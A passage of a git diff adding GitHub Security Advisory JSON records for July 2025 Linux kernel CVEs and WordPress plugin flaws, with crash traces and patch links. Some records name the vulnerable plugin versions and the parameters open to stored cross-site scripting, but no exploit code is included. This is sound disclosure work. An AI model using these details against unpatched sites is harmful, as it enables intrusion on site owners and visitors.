"https://git.kernel.org/stable/c/b48878aee8e7311411148c7a67c8f0b02f571d75" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/befd9a71d859ea625eaa84dae1b243efb3df3eca" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-25T13:15:24Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-5g8h-g27f-mh64/GHSA-5g8h-g27f-mh64.json b/advisories/unreviewed/2025/07/GHSA-5g8h-g27f-mh64/GHSA-5g8h-g27f-mh64.json new file mode 100644 index 0000000000000..5af56a78940e3 --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-5g8h-g27f-mh64/GHSA-5g8h-g27f-mh64.json @@ -0,0 +1,37 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-5g8h-g27f-mh64", + "modified": "2025-07-25T15:30:53Z", + "published": "2025-07-25T15:30:53Z", + "aliases": [ + "CVE-2025-38405" + ], + "details": "In the Linux kernel, the following vulnerability has been resolved:\n\nnvmet: fix memory leak of bio integrity\n\nIf nvmet receives commands with metadata there is a continuous memory\nleak of kmalloc-128 slab or more precisely bio->bi_integrity.\n\nSince commit bf4c89fc8797 (\"block: don't call bio_uninit from bio_endio\")\neach user of bio_init has to use bio_uninit as well. Otherwise the bio\nintegrity is not getting free. Nvmet uses bio_init for inline bios.\n\nUninit the inline bio to complete deallocation of integrity in bio.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-38405" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/190f4c2c863af7cc5bb354b70e0805f06419c038" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/2e2028fcf924d1c6df017033c8d6e28b735a0508" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/431e58d56fcb5ff1f9eb630724a922e0d2a941df" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-25T14:15:32Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-5pjf-mw33-c6c3/GHSA-5pjf-mw33-c6c3.json b/advisories/unreviewed/2025/07/GHSA-5pjf-mw33-c6c3/GHSA-5pjf-mw33-c6c3.json new file mode 100644 index 0000000000000..776296590f87a --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-5pjf-mw33-c6c3/GHSA-5pjf-mw33-c6c3.json @@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-5pjf-mw33-c6c3", + "modified": "2025-07-25T15:30:44Z", + "published": "2025-07-25T15:30:44Z", + "aliases": [ + "CVE-2025-7822" + ], + "details": "The WP Wallcreeper plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the admin_notices hook in all versions up to, and including, 1.6.1. This makes it possible for authenticated attackers, with Subscriber-level access and above, to enable and disable caching.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-7822" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/wp-wallcreeper/trunk/wp-wallcreeper.php#L166" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/629f36e3-f4a4-43a6-a98b-960088c8dd77?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-862" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-24T10:15:28Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-5wmp-9678-6384/GHSA-5wmp-9678-6384.json b/advisories/unreviewed/2025/07/GHSA-5wmp-9678-6384/GHSA-5wmp-9678-6384.json new file mode 100644 index 0000000000000..3645567c673a4 --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-5wmp-9678-6384/GHSA-5wmp-9678-6384.json @@ -0,0 +1,44 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-5wmp-9678-6384", + "modified": "2025-07-25T15:30:44Z", + "published": "2025-07-25T15:30:44Z", + "aliases": [ + "CVE-2025-7959" + ], + "details": "The Station Pro plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the ‘width' and 'height’ parameter in all versions up to, and including, 2.4.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-7959" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/station-pro/tags/2.4.2/core/inc/player/class-station-player.php#L71" + }, + { + "type": "WEB", + "url": "https://wordpress.org/plugins/station-pro/#developers" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/f4026b41-29c3-4e0a-bf75-ae4ba47edb4f?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-24T10:15:29Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-5x6v-ph8q-fg62/GHSA-5x6v-ph8q-fg62.json b/advisories/unreviewed/2025/07/GHSA-5x6v-ph8q-fg62/GHSA-5x6v-ph8q-fg62.json new file mode 100644 index 0000000000000..e6a2b9e5a839c --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-5x6v-ph8q-fg62/GHSA-5x6v-ph8q-fg62.json @@ -0,0 +1,45 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-5x6v-ph8q-fg62", + "modified": "2025-07-25T15:30:54Z", + "published": "2025-07-25T15:30:54Z", + "aliases": [ + "CVE-2025-38422" + ], + "details": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: lan743x: Modify the EEPROM and OTP size for PCI1xxxx devices\n\nMaximum OTP and EEPROM size for hearthstone PCI1xxxx devices are 8 Kb\nand 64 Kb respectively. Adjust max size definitions and return correct\nEEPROM length based on device. Also prevent out-of-bound read/write.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-38422" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/088279ff18cdc437d6fac5890e0c52c624f78a5b" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/3b9935586a9b54d2da27901b830d3cf46ad66a1e" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/51318d644c993b3f7a60b8616a6a5adc1e967cd2" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/6b4201d74d0a49af2123abf2c9d142e59566714b" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/9c41d2a2aa3817946eb613522200cab55513ddaa" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-25T15:15:27Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-62f3-xhhg-6p74/GHSA-62f3-xhhg-6p74.json b/advisories/unreviewed/2025/07/GHSA-62f3-xhhg-6p74/GHSA-62f3-xhhg-6p74.json new file mode 100644 index 0000000000000..4c2f25bed5e96 --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-62f3-xhhg-6p74/GHSA-62f3-xhhg-6p74.json @@ -0,0 +1,33 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-62f3-xhhg-6p74", + "modified": "2025-07-25T15:30:51Z", + "published": "2025-07-25T15:30:51Z", + "aliases": [ + "CVE-2025-38359" + ], + "details": "In the Linux kernel, the following vulnerability has been resolved:\n\ns390/mm: Fix in_atomic() handling in do_secure_storage_access()\n\nKernel user spaces accesses to not exported pages in atomic context\nincorrectly try to resolve the page fault.\nWith debug options enabled call traces like this can be seen:\n\nBUG: sleeping function called from invalid context at kernel/locking/rwsem.c:1523\nin_atomic(): 1, irqs_disabled(): 0, non_block: 0, pid: 419074, name: qemu-system-s39\npreempt_count: 1, expected: 0\nRCU nest depth: 0, expected: 0\nINFO: lockdep is turned off.\nPreemption disabled at:\n[<00000383ea47cfa2>] copy_page_from_iter_atomic+0xa2/0x8a0\nCPU: 12 UID: 0 PID: 419074 Comm: qemu-system-s39\nTainted: G W 6.16.0-20250531.rc0.git0.69b3a602feac.63.fc42.s390x+debug #1 PREEMPT\nTainted: [W]=WARN\nHardware name: IBM 3931 A01 703 (LPAR)\nCall Trace:\n [<00000383e990d282>] dump_stack_lvl+0xa2/0xe8\n [<00000383e99bf152>] __might_resched+0x292/0x2d0\n [<00000383eaa7c374>] down_read+0x34/0x2d0\n [<00000383e99432f8>] do_secure_storage_access+0x108/0x360\n [<00000383eaa724b0>] __do_pgm_check+0x130/0x220\n [<00000383eaa842e4>] pgm_check_handler+0x114/0x160\n [<00000383ea47d028>] copy_page_from_iter_atomic+0x128/0x8a0\n([<00000383ea47d016>] copy_page_from_iter_atomic+0x116/0x8a0)\n [<00000383e9c45eae>] generic_perform_write+0x16e/0x310\n [<00000383e9eb87f4>] ext4_buffered_write_iter+0x84/0x160\n [<00000383e9da0de4>] vfs_write+0x1c4/0x460\n [<00000383e9da123c>] ksys_write+0x7c/0x100\n [<00000383eaa7284e>] __do_syscall+0x15e/0x280\n [<00000383eaa8417e>] system_call+0x6e/0x90\nINFO: lockdep is turned off.\n\nIt is not allowed to take the mmap_lock while in atomic context. Therefore\nhandle such a secure storage access fault as if the accessed page is not\nmapped: the uaccess function will return -EFAULT, and the caller has to\ndeal with this. Usually this means that the access is retried in process\ncontext, which allows to resolve the page fault (or in this case export the\npage).", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-38359" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/11709abccf93b08adde95ef313c300b0d4bc28f1" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/d2e317dfd2d1fe416c77315d17c5d57dbe374915" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-25T13:15:24Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-637r-5w8j-mjg6/GHSA-637r-5w8j-mjg6.json b/advisories/unreviewed/2025/07/GHSA-637r-5w8j-mjg6/GHSA-637r-5w8j-mjg6.json new file mode 100644 index 0000000000000..b3655281a732e --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-637r-5w8j-mjg6/GHSA-637r-5w8j-mjg6.json @@ -0,0 +1,41 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-637r-5w8j-mjg6", + "modified": "2025-07-25T15:30:54Z", + "published": "2025-07-25T15:30:54Z", + "aliases": [ + "CVE-2025-38436" + ], + "details": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/scheduler: signal scheduled fence when kill job\n\nWhen an entity from application B is killed, drm_sched_entity_kill()\nremoves all jobs belonging to that entity through\ndrm_sched_entity_kill_jobs_work(). If application A's job depends on a\nscheduled fence from application B's job, and that fence is not properly\nsignaled during the killing process, application A's dependency cannot be\ncleared.\n\nThis leads to application A hanging indefinitely while waiting for a\ndependency that will never be resolved. Fix this issue by ensuring that\nscheduled fences are properly signaled when an entity is killed, allowing\ndependent applications to continue execution.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-38436" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/471db2c2d4f80ee94225a1ef246e4f5011733e50" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/aa382a8b6ed483e9812d0e63b6d1bdcba0186f29" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/aefd0a935625165a6ca36d0258d2d053901555df" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/c5734f9bab6f0d40577ad0633af4090a5fda2407" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-25T15:15:29Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-6gg7-c9v3-hv72/GHSA-6gg7-c9v3-hv72.json b/advisories/unreviewed/2025/07/GHSA-6gg7-c9v3-hv72/GHSA-6gg7-c9v3-hv72.json new file mode 100644 index 0000000000000..505b3e865a1c7 --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-6gg7-c9v3-hv72/GHSA-6gg7-c9v3-hv72.json @@ -0,0 +1,44 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-6gg7-c9v3-hv72", + "modified": "2025-07-25T15:30:44Z", + "published": "2025-07-25T15:30:44Z", + "aliases": [ + "CVE-2025-8071" + ], + "details": "Mine CloudVod plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the ‘audio’ parameter in all versions up to, and including, 2.1.10 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-8071" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/mine-cloudvod/tags/2.1.10/build/audioplayer/render.php#L66" + }, + { + "type": "WEB", + "url": "https://wordpress.org/plugins/mine-cloudvod/#developers" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/5f3cd194-3fb8-4dd9-905e-051d5de68b66?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-24T10:15:29Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-6gw9-2x6r-hqw8/GHSA-6gw9-2x6r-hqw8.json b/advisories/unreviewed/2025/07/GHSA-6gw9-2x6r-hqw8/GHSA-6gw9-2x6r-hqw8.json new file mode 100644 index 0000000000000..02e426cce535d --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-6gw9-2x6r-hqw8/GHSA-6gw9-2x6r-hqw8.json @@ -0,0 +1,37 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-6gw9-2x6r-hqw8", + "modified": "2025-07-25T15:30:51Z", + "published": "2025-07-25T15:30:51Z", + "aliases": [ + "CVE-2025-38372" + ], + "details": "In the Linux kernel, the following vulnerability has been resolved:\n\nRDMA/mlx5: Fix unsafe xarray access in implicit ODP handling\n\n__xa_store() and __xa_erase() were used without holding the proper lock,\nwhich led to a lockdep warning due to unsafe RCU usage. This patch\nreplaces them with xa_store() and xa_erase(), which perform the necessary\nlocking internally.\n\n =============================\n WARNING: suspicious RCPU usage\n 6.14.0-rc7_for_upstream_debug_2025_03_18_15_01 #1 Not tainted\n -----------------------------\n ./include/linux/xarray.h:1211 suspicious rcu_dereference_protected() usage!\n\n other info that might help us debug this:\n\n rcu_scheduler_active = 2, debug_locks = 1\n 3 locks held by kworker/u136:0/219:\n at: process_one_work+0xbe4/0x15f0\n process_one_work+0x75c/0x15f0\n pagefault_mr+0x9a5/0x1390 [mlx5_ib]\n\n stack backtrace:\n CPU: 14 UID: 0 PID: 219 Comm: kworker/u136:0 Not tainted\n 6.14.0-rc7_for_upstream_debug_2025_03_18_15_01 #1\n Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS\n rel-1.16.0-0-gd239552ce722-prebuilt.qemu.org 04/01/2014\n Workqueue: mlx5_ib_page_fault mlx5_ib_eqe_pf_action [mlx5_ib]\n Call Trace:\n dump_stack_lvl+0xa8/0xc0\n lockdep_rcu_suspicious+0x1e6/0x260\n xas_create+0xb8a/0xee0\n xas_store+0x73/0x14c0\n __xa_store+0x13c/0x220\n ? xa_store_range+0x390/0x390\n ? spin_bug+0x1d0/0x1d0\n pagefault_mr+0xcb5/0x1390 [mlx5_ib]\n ? _raw_spin_unlock+0x1f/0x30\n mlx5_ib_eqe_pf_action+0x3be/0x2620 [mlx5_ib]\n ? lockdep_hardirqs_on_prepare+0x400/0x400\n ? mlx5_ib_invalidate_range+0xcb0/0xcb0 [mlx5_ib]\n process_one_work+0x7db/0x15f0\n ? pwq_dec_nr_in_flight+0xda0/0xda0\n ? assign_work+0x168/0x240\n worker_thread+0x57d/0xcd0\n ? rescuer_thread+0xc40/0xc40\n kthread+0x3b3/0x800\n ? kthread_is_per_cpu+0xb0/0xb0\n ? lock_downgrade+0x680/0x680\n ? do_raw_spin_lock+0x12d/0x270\n ? spin_bug+0x1d0/0x1d0\n ? finish_task_switch.isra.0+0x284/0x9e0\n ? lockdep_hardirqs_on_prepare+0x284/0x400\n ? kthread_is_per_cpu+0xb0/0xb0\n ret_from_fork+0x2d/0x70\n ? kthread_is_per_cpu+0xb0/0xb0\n ret_from_fork_asm+0x11/0x20", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-38372" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/2c6b640ea08bff1a192bf87fa45246ff1e40767c" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/9d2ef890e49963b768d4fe5a33029aacd9f6b93f" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/ebebffb47c78f63ba7e4fbde393e44af38b7625d" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-25T13:15:26Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-6p9w-8r99-f39c/GHSA-6p9w-8r99-f39c.json b/advisories/unreviewed/2025/07/GHSA-6p9w-8r99-f39c/GHSA-6p9w-8r99-f39c.json new file mode 100644 index 0000000000000..ef9c3e0bc1c8d --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-6p9w-8r99-f39c/GHSA-6p9w-8r99-f39c.json @@ -0,0 +1,57 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-6p9w-8r99-f39c", + "modified": "2025-07-25T15:30:54Z", + "published": "2025-07-25T15:30:54Z", + "aliases": [ + "CVE-2025-38424" + ], + "details": "In the Linux kernel, the following vulnerability has been resolved:\n\nperf: Fix sample vs do_exit()\n\nBaisheng Gao reported an ARM64 crash, which Mark decoded as being a\nsynchronous external abort -- most likely due to trying to access\nMMIO in bad ways.\n\nThe crash further shows perf trying to do a user stack sample while in\nexit_mmap()'s tlb_finish_mmu() -- i.e. while tearing down the address\nspace it is trying to access.\n\nIt turns out that we stop perf after we tear down the userspace mm; a\nreceipie for disaster, since perf likes to access userspace for\nvarious reasons.\n\nFlip this order by moving up where we stop perf in do_exit().\n\nAdditionally, harden PERF_SAMPLE_CALLCHAIN and PERF_SAMPLE_STACK_USER\nto abort when the current task does not have an mm (exit_mm() makes\nsure to set current->mm = NULL; before commencing with the actual\nteardown). Such that CPU wide events don't trip on this same problem.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-38424" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/2ee6044a693735396bb47eeaba1ac3ae26c1c99b" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/456019adaa2f5366b89c868dea9b483179bece54" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/4f6fc782128355931527cefe3eb45338abd8ab39" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/507c9a595bad3abd107c6a8857d7fd125d89f386" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/7311970d07c4606362081250da95f2c7901fc0db" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/7b8f3c72175c6a63a95cf2e219f8b78e2baad34e" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/975ffddfa2e19823c719459d2364fcaa17673964" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/a9f6aab7910a0ef2895797f15c947f6d1053160f" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-25T15:15:27Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-6r64-vv6h-j895/GHSA-6r64-vv6h-j895.json b/advisories/unreviewed/2025/07/GHSA-6r64-vv6h-j895/GHSA-6r64-vv6h-j895.json new file mode 100644 index 0000000000000..1987ecd451dc6 --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-6r64-vv6h-j895/GHSA-6r64-vv6h-j895.json @@ -0,0 +1,33 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-6r64-vv6h-j895", + "modified": "2025-07-25T15:30:52Z", + "published": "2025-07-25T15:30:52Z", + "aliases": [ + "CVE-2025-38394" + ], + "details": "In the Linux kernel, the following vulnerability has been resolved:\n\nHID: appletb-kbd: fix memory corruption of input_handler_list\n\nIn appletb_kbd_probe an input handler is initialised and then registered\nwith input core through input_register_handler(). When this happens input\ncore will add the input handler (specifically its node) to the global\ninput_handler_list. The input_handler_list is central to the functionality\nof input core and is traversed in various places in input core. An example\nof this is when a new input device is plugged in and gets registered with\ninput core.\n\nThe input_handler in probe is allocated as device managed memory. If a\nprobe failure occurs after input_register_handler() the input_handler\nmemory is freed, yet it will remain in the input_handler_list. This\neffectively means the input_handler_list contains a dangling pointer\nto data belonging to a freed input handler.\n\nThis causes an issue when any other input device is plugged in - in my\ncase I had an old PixArt HP USB optical mouse and I decided to\nplug it in after a failure occurred after input_register_handler().\nThis lead to the registration of this input device via\ninput_register_device which involves traversing over every handler\nin the corrupted input_handler_list and calling input_attach_handler(),\ngiving each handler a chance to bind to newly registered device.\n\nThe core of this bug is a UAF which causes memory corruption of\ninput_handler_list and to fix it we must ensure the input handler is\nunregistered from input core, this is done through\ninput_unregister_handler().\n\n[ 63.191597] ==================================================================\n[ 63.192094] BUG: KASAN: slab-use-after-free in input_attach_handler.isra.0+0x1a9/0x1e0\n[ 63.192094] Read of size 8 at addr ffff888105ea7c80 by task kworker/0:2/54\n[ 63.192094]\n[ 63.192094] CPU: 0 UID: 0 PID: 54 Comm: kworker/0:2 Not tainted 6.16.0-rc2-00321-g2aa6621d\n[ 63.192094] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.16.2-debian-1.164\n[ 63.192094] Workqueue: usb_hub_wq hub_event\n[ 63.192094] Call Trace:\n[ 63.192094] \n[ 63.192094] dump_stack_lvl+0x53/0x70\n[ 63.192094] print_report+0xce/0x670\n[ 63.192094] kasan_report+0xce/0x100\n[ 63.192094] input_attach_handler.isra.0+0x1a9/0x1e0\n[ 63.192094] input_register_device+0x76c/0xd00\n[ 63.192094] hidinput_connect+0x686d/0xad60\n[ 63.192094] hid_connect+0xf20/0x1b10\n[ 63.192094] hid_hw_start+0x83/0x100\n[ 63.192094] hid_device_probe+0x2d1/0x680\n[ 63.192094] really_probe+0x1c3/0x690\n[ 63.192094] __driver_probe_device+0x247/0x300\n[ 63.192094] driver_probe_device+0x49/0x210\n[ 63.192094] __device_attach_driver+0x160/0x320\n[ 63.192094] bus_for_each_drv+0x10f/0x190\n[ 63.192094] __device_attach+0x18e/0x370\n[ 63.192094] bus_probe_device+0x123/0x170\n[ 63.192094] device_add+0xd4d/0x1460\n[ 63.192094] hid_add_device+0x30b/0x910\n[ 63.192094] usbhid_probe+0x920/0xe00\n[ 63.192094] usb_probe_interface+0x363/0x9a0\n[ 63.192094] really_probe+0x1c3/0x690\n[ 63.192094] __driver_probe_device+0x247/0x300\n[ 63.192094] driver_probe_device+0x49/0x210\n[ 63.192094] __device_attach_driver+0x160/0x320\n[ 63.192094] bus_for_each_drv+0x10f/0x190\n[ 63.192094] __device_attach+0x18e/0x370\n[ 63.192094] bus_probe_device+0x123/0x170\n[ 63.192094] device_add+0xd4d/0x1460\n[ 63.192094] usb_set_configuration+0xd14/0x1880\n[ 63.192094] usb_generic_driver_probe+0x78/0xb0\n[ 63.192094] usb_probe_device+0xaa/0x2e0\n[ 63.192094] really_probe+0x1c3/0x690\n[ 63.192094] __driver_probe_device+0x247/0x300\n[ 63.192094] driver_probe_device+0x49/0x210\n[ 63.192094] __device_attach_driver+0x160/0x320\n[ 63.192094] bus_for_each_drv+0x10f/0x190\n[ 63.192094] __device_attach+0x18e/0x370\n[ 63.192094] bus_probe_device+0x123/0x170\n[ 63.192094] device_add+0xd4d/0x1460\n[ 63.192094] usb_new_device+0x7b4/0x1000\n[ 63.192094] hub_event+0x234d/0x3\n---truncated---", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-38394" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/6ad40b07e15c29712d9a4b8096914ccd82e3fc17" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/c80f2b047d5cc42fbd2dff9d1942d4ba7545100f" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-25T13:15:28Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-733g-xvvm-2g6j/GHSA-733g-xvvm-2g6j.json b/advisories/unreviewed/2025/07/GHSA-733g-xvvm-2g6j/GHSA-733g-xvvm-2g6j.json new file mode 100644 index 0000000000000..fc5bd8fb3af62 --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-733g-xvvm-2g6j/GHSA-733g-xvvm-2g6j.json @@ -0,0 +1,57 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-733g-xvvm-2g6j", + "modified": "2025-07-25T15:30:54Z", + "published": "2025-07-25T15:30:54Z", + "aliases": [ + "CVE-2025-38428" + ], + "details": "In the Linux kernel, the following vulnerability has been resolved:\n\nInput: ims-pcu - check record size in ims_pcu_flash_firmware()\n\nThe \"len\" variable comes from the firmware and we generally do\ntrust firmware, but it's always better to double check. If the \"len\"\nis too large it could result in memory corruption when we do\n\"memcpy(fragment->data, rec->data, len);\"", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-38428" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/17474a56acf708bf6b2d174c06ed26abad0a9fd6" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/5a8cd6ae8393e2eaebf51d420d5374821ef2af87" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/74661516daee1eadebede8dc607b6830530096ec" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/8e03f1c7d50343bf21da54873301bc4fa647479f" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/a95ef0199e80f3384eb992889322957d26c00102" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/c1b9d140b0807c6aee4bb53e1bfa4e391e3dc204" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/d63706d9f73846106fde28b284f08e01b92ce9f1" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/e5a2481dc2a0b430f49276d7482793a8923631d6" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-25T15:15:27Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-73j2-c6c6-cr45/GHSA-73j2-c6c6-cr45.json b/advisories/unreviewed/2025/07/GHSA-73j2-c6c6-cr45/GHSA-73j2-c6c6-cr45.json new file mode 100644 index 0000000000000..65593be068b61 --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-73j2-c6c6-cr45/GHSA-73j2-c6c6-cr45.json @@ -0,0 +1,53 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-73j2-c6c6-cr45", + "modified": "2025-07-25T15:30:53Z", + "published": "2025-07-25T15:30:53Z", + "aliases": [ + "CVE-2025-38399" + ], + "details": "In the Linux kernel, the following vulnerability has been resolved:\n\nscsi: target: Fix NULL pointer dereference in core_scsi3_decode_spec_i_port()\n\nThe function core_scsi3_decode_spec_i_port(), in its error code path,\nunconditionally calls core_scsi3_lunacl_undepend_item() passing the\ndest_se_deve pointer, which may be NULL.\n\nThis can lead to a NULL pointer dereference if dest_se_deve remains\nunset.\n\nSPC-3 PR SPEC_I_PT: Unable to locate dest_tpg\nUnable to handle kernel paging request at virtual address dfff800000000012\nCall trace:\n core_scsi3_lunacl_undepend_item+0x2c/0xf0 [target_core_mod] (P)\n core_scsi3_decode_spec_i_port+0x120c/0x1c30 [target_core_mod]\n core_scsi3_emulate_pro_register+0x6b8/0xcd8 [target_core_mod]\n target_scsi3_emulate_pr_out+0x56c/0x840 [target_core_mod]\n\nFix this by adding a NULL check before calling\ncore_scsi3_lunacl_undepend_item()", + "severity": [], + "affected": [], + "references": [ + { 